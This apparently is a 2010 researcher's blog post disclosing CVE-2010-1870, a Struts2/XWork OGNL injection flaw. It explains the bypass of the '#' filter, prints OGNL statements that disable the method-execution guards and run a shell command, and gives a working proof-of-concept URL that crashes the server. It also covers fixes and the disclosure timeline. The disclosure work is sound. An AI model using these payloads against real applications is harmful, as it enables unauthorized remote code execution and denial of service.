Friday, July 9, 2010
CVE-2010-1870: Struts2/XWork remote command execution
Update Tue Jul 13 2010: Added proof of concept
The Apache Struts team has announced and uploaded, but, due to an
unreasonably prolonged voting process, has not released the 2.2.0
release of the Struts2 web framework, which fixes a vulnerability that I
reported to them on May 31st 2010. The Apache Struts team is
ridiculously slow in releasing the fixed version and all of my attempts
to expedite the process have failed.
Introduction
Struts2 is Struts + WebWork. WebWork in turn uses XWork to invoke
actions and call appropriate setters/getters based on HTTP parameter
names, which is achieved by treating each HTTP parameter name as an OGNL
statement. OGNL (Object Graph Navigation Language) is what turns:
user.address.city=Bishkek&user['favoriteDrink']=kumys
into
action.getUser().getAddress().setCity("Bishkek")
action.getUser().setFavoriteDrink("kumys")
This is performed by the ParametersInterceptor, which calls
ValueStack.setValue() with user-supplied HTTP parameters as arguments.
NOTE: If you are using XWork's ParametersInterceptor or operate with
OGNL ValueStack in a similar way then you are vulnerable
(ParametersInterceptor is on by default in struts-default.xml).
In addition to property getting/setting, OGNL supports many more
features:
* Method calling: foo()
* Static method calling: @java.lang.System@exit(1)
* Constructor calling: new MyClass()
* Ability to work with context variables: #foo = new MyClass()
* And more...
Since HTTP parameter names are OGNL statements, XWork has the following
two variables guarding method execution, to prevent an attacker from
calling arbitrary methods via HTTP parameters:
* OgnlContext's property 'xwork.MethodAccessor.denyMethodExecution'
(set to true by default)
* SecurityMemberAccess private field called
'allowStaticMethodAccess' (set to false by default)
OGNL Context variables
To make it easier for developers to access various frequently needed
objects XWork provides several predefined context variables:
* #application
* #session
* #request
* #parameters
* #attr
These variables represent various server-side objects, such as the
session map. To prevent attackers from tampering with server-side
objects XWork's ParametersInterceptor disallowed # in parameter names.
About a year ago I found a way to bypass that protection (XW-641) using
Java's unicode String representation: \u0023. At the time I felt that
the fix that was implemented (OGNL value stack clearing) was
insufficient, but had no time to investigate this further.
CVE-2010-1870
Earlier this year I finally got a chance to look at this again and found
that in addition to the above mentioned context variables there were
more:
* #context - OgnlContext, the one guarding method execution based on
'xwork.MethodAccessor.denyMethodExecution' property value.
* #_memberAccess - SecurityMemberAccess, whose 'allowStaticMethodAccess'
field prevented static method execution.
* #root
* #this
* #_typeResolver
* #_classResolver
* #_traceEvaluations
* #_lastEvaluation
* #_keepLastEvaluation
You can probably see the problem already. Using the XW-641 trick I was
able to modify the values that were guarding Java method execution and
run arbitrary Java code:
#_memberAccess['allowStaticMethodAccess'] = true
#foo = new java.lang.Boolean("false")
#context['xwork.MethodAccessor.denyMethodExecution'] = #foo
#rt = @java.lang.Runtime@getRuntime()
#rt.exec('mkdir /tmp/PWNED')
The actual proof of concept had to use OGNL's expression evaluation when
crafting the HTTP request. The PoC for this bug will be published on
July 12 2010. To test whether your application is vulnerable you can use
the following proof of concept, which will call
java.lang.Runtime.getRuntime().exit(1):
http://mydomain/MyStruts.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1
Fixing CVE-2010-1870
Struts2 users must upgrade to 2.2.0, which whitelists a set of
characters that excludes the characters required to exploit this
vulnerability.
In cases where an upgrade isn't possible you can use
ParametersInterceptor's "excludeParams" parameter to whitelist the
characters required for your application to operate correctly (usually
A-z0-9_.'"[]); alternatively you can blacklist \()@, which are the
characters required to exploit this bug.
Timeline
May 31st - email to security@struts.apache.org with vulnerability report.
June 4th - no response received, contacted developers again.
June 5th - had to find an XWork developer on IRC to look at this.
June 16th - Atlassian fixes vulnerability in its products. Atlassian and
Struts developers worked together in coming up with the fix.
June 20th - 1-line fix committed
June 29th - Struts 2.2.0 release voting process started and is still
going...